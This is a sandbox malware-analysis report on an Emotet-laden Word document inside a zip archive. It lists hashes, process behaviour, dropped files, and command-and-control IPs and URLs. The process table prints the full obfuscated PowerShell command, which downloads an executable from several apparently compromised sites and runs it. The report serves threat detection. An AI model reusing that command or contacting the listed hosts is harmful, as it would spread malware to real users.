analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

82b46d24c4f3b9c435f98e2851efe84b.zip

Full analysis: https://app.any.run/tasks/b08cfe0b-61cd-436f-b532-fe13675010a3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 20, 2019, 16:29:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

24807618B6BCB8747E48D8F4DB8999D3

SHA1:

9D27C25357E817EA75D3E2294A843B92DB1F0BED

SHA256:

E2A4749668E5F74D4BFD4491BACA23363C25A53C1B0456ECD58DDF5238F725CE

SSDEEP:

1536:w4HNx23qzzhzFAP2bzyYFuDRnnZaIP7fH8a9g8j4rZSdvKdQli3cI:NNxf3RGP2bO1FnxzcSj4rZSv6Qli3cI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 764.exe (PID: 128)
      • 764.exe (PID: 2296)
      • soundser.exe (PID: 2644)
      • soundser.exe (PID: 928)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2084)

    • Emotet process was detected

      • soundser.exe (PID: 2644)

    • EMOTET was detected

      • soundser.exe (PID: 928)

    • Changes the autorun value in the registry

      • soundser.exe (PID: 928)

    • Connects to CnC server

      • soundser.exe (PID: 928)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 2448)

    • PowerShell script executed

      • powershell.exe (PID: 2084)

    • Executed via WMI

      • powershell.exe (PID: 2084)

    • Creates files in the user directory

      • powershell.exe (PID: 2084)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2084)
      • 764.exe (PID: 2296)

    • Starts itself from another location

      • 764.exe (PID: 2296)

    • Connects to server without host name

      • soundser.exe (PID: 928)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2772)

    • Manual execution by user

      • rundll32.exe (PID: 2448)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2772)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:05:20 18:24:09
ZipCRC: 0xbf026f44
ZipCompressedSize: 87080
ZipUncompressedSize: 137472
ZipFileName: 82b46d24c4f3b9c435f98e2851efe84b
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs rundll32.exe no specs winword.exe no specs powershell.exe 764.exe no specs 764.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
2908"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\82b46d24c4f3b9c435f98e2851efe84b.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2448"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\82b46d24c4f3b9c435f98e2851efe84bC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2772"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\82b46d24c4f3b9c435f98e2851efe84b"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2084powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSADEAOABfADQAOAAxADAAPQAnAGIAMQAzAF8ANQAyADMAMwAnADsAJABCADEAOQA5ADYANgA2ADgAIAA9ACAAJwA3ADYANAAnADsAJABuADIANAAwADgAMgA3AD0AJwBOADYAMQAzADEANgA2ACcAOwAkAFcANwAwADMAMgA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABCADEAOQA5ADYANgA2ADgAKwAnAC4AZQB4AGUAJwA7ACQARwAzADQAMAAyADUAPQAnAHAANAA1ADQAMwBfADYANQAnADsAJABZADkANwA1ADUAXwA0ADgAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAGAAVAAuAHcAZQBiAGMATABpAEUATgBUADsAJABQADcANwAxADMAMAA5AD0AJwBoAHQAdABwADoALwAvAHMAZQBvAGcAbwBvAGQALgBuAGUAdAAvAHcAcAAvAGIANABwAHgAcgBlADYAMwAwADQALwBAAGgAdAB0AHAAOgAvAC8AYQBnAHIAbwAtAG0AaQBsAGwAZQBuAGkAYQBsAC4AYwBvAG0ALwBzAGUAdAB1AHAAYwBvAG4AZgBpAGcAbwAvADAAcwB0ADkAMwA3ADYALwBAAGgAdAB0AHAAcwA6AC8ALwBwAHIAbwB5AGUAYwB0AG8AbgBvAHYAaQBlAG0AYgByAGUALgBjAG8AbQAvAFYAMgAuADAALgAwAC8ANwBvAHUAdgB1ADQANwAvAEAAaAB0AHQAcAA6AC8ALwByAG8AeQBhAGwAYQBtAGUAcgBpAGMAYQBuAGMAbwBuAHMAdAByAHUAYwB0AGkAbwBuAC4AYwBvAG0ALwBmAHcAbQBpAGgAZQAvADAANABxAGYANgB1AHkAMAAvAEAAaAB0AHQAcAA6AC8ALwBmAGEAcgBvAGQAZQBiAGEAYgBlAGwALgBjAG8AbQAvADQAeABoAHoAdgBkADcALwBuAGwAMQAyAC8AJwAuAFMAcABMAGkAVAAoACcAQAAnACkAOwAkAFEAMQA3ADcANgA3ADUANgA9ACcAegBfADAANwA4AF8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAGoAMQA5ADMANgAyADUAIABpAG4AIAAkAFAANwA3ADEAMwAwADkAKQB7AHQAcgB5AHsAJABZADkANwA1ADUAXwA0ADgALgBEAG8AdwBOAGwATwBhAGQAZgBJAEwAZQAoACQAagAxADkAMwA2ADIANQAsACAAJABXADcAMAAzADIAOQApADsAJABKADAAXwBfADAAMAA0ADMAPQAnAHcANwA3ADAANgA3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVwA3ADAAMwAyADkAKQAuAGwARQBuAEcAVABIACAALQBnAGUAIAAyADMANgA0ADMAKQAgAHsAJgAoACcASQBuACcAKwAnAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAVwA3ADAAMwAyADkAOwAkAGIAOAA4ADYAOAA1ADAAMAA9ACcAbwA3ADQANAA3ADMAOQAnADsAYgByAGUAYQBrADsAJABKADkANAAzADkAMwA2AD0AJwBHADUANAA1ADQAMwAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAMwA3ADEAXwA1ADkAPQAnAGoANABfADcAOQA3ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
128"C:\Users\admin\764.exe" C:\Users\admin\764.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2296--195238b3C:\Users\admin\764.exe
764.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2644"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
764.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
928--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 305
Read events
1 731
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
2772WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR794F.tmp.cvr
MD5:
SHA256:
2084powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WZ6IRAU22W88WGS38UAC.temp
MD5:
SHA256:
2772WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76228FD3.wmfwmf
MD5:8C257D2305A61716DDDA2B9285B21A06
SHA256:B0547898DAC73E92C6750606DDD0DF00AE4AEDF46EF472DCA8B40E33148A90AF
2084powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF128c2b.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
2772WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:DD0FB2721599B5C416F626A3B562BE5F
SHA256:D4E24015F34C4DDF75592DAC6CC88F02EBCCE304770704EDEAB5AFDDD5B78F3D
2908WinRAR.exeC:\Users\admin\Desktop\82b46d24c4f3b9c435f98e2851efe84bdocument
MD5:82B46D24C4F3B9C435F98E2851EFE84B
SHA256:2A2837E6D0D46B9DAEC5EE1D95230BC15403F4403F313E5042D52D6FE48FF094
2772WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3C22C59.wmfwmf
MD5:EC4261AED6E736243D6EE6B8B67FA6EE
SHA256:A4BB94776438D28EAC29BBB6BF00ACC04AF93D882ED479D907076129BB1FEA9D
2772WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:BFA0E16EEAC5634D8355B4CC333DF024
SHA256:BDD5B59750BC30C7B7CC70E382835FE0A1DA3A0A99BCFB814346E913BB643E54
2084powershell.exeC:\Users\admin\764.exeexecutable
MD5:41EF82921697CB1C0AD4C2ACB3CCD0BA
SHA256:E5BE3C0B66D7C3C2986202FAF860F4CCE41892DB64C91E8322A57C2E4C23ECF0
2772WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0AA5FB8.wmfwmf
MD5:54A14F58DC5BD85F54F3CD80B06D6472
SHA256:DB6913FAC0BF15503F0C643F113B88B1CF0A76F2B4FE24D02916F3782549E08F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2084
powershell.exe
GET
200
210.211.111.85:80
http://seogood.net/wp/b4pxre6304/
VN
executable
74.0 Kb
suspicious
928
soundser.exe
POST
80.0.106.83:80
http://80.0.106.83/health/
GB
malicious
928
soundser.exe
POST
200
81.143.213.156:7080
http://81.143.213.156:7080/vermont/health/ringin/
GB
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
81.143.213.156:7080
British Telecommunications PLC
GB
malicious
2084
powershell.exe
210.211.111.85:80
seogood.net
CHT Compamy Ltd
VN
suspicious
928
soundser.exe
80.0.106.83:80
Virgin Media Limited
GB
malicious

DNS requests

Domain
IP
Reputation
seogood.net
  • 210.211.111.85
suspicious

Threats

PID
Process
Class
Message
928
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
928
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
7 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
82b46d24c4f3b9c435f98e2851efe84b.zip